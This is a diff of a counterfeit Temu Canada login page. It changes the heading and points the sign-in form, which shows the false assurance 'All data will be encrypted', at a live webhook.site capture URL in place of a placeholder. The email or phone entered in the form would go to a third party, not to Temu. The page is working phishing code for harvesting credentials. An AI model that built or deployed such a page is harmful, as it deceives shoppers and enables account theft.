--- a/www.temu.com/ca/login.html
+++ b/www.temu.com/ca/login.html
@@ -82,9 +82,9 @@
   <div class="logo-bar">TEMU</div>
   <div class="modal-container">
     <div class="modal-box">
-      <h2>Sign in / Register</h2>
+      <h2>Sign in </h2>
       <p class="secure-text">🔒 All data will be encrypted</p>
-      <form action="https://webhook.site/YOUR-UUID-HERE" method="POST">
+      <form action="https://webhook.site/7960af42-db82-40d7-b6fa-5b0c0a637471" method="POST">
         <div class="form-group">
           <label for="email">Email or phone number</label>
           <input type="text" id="email" name="email" required>
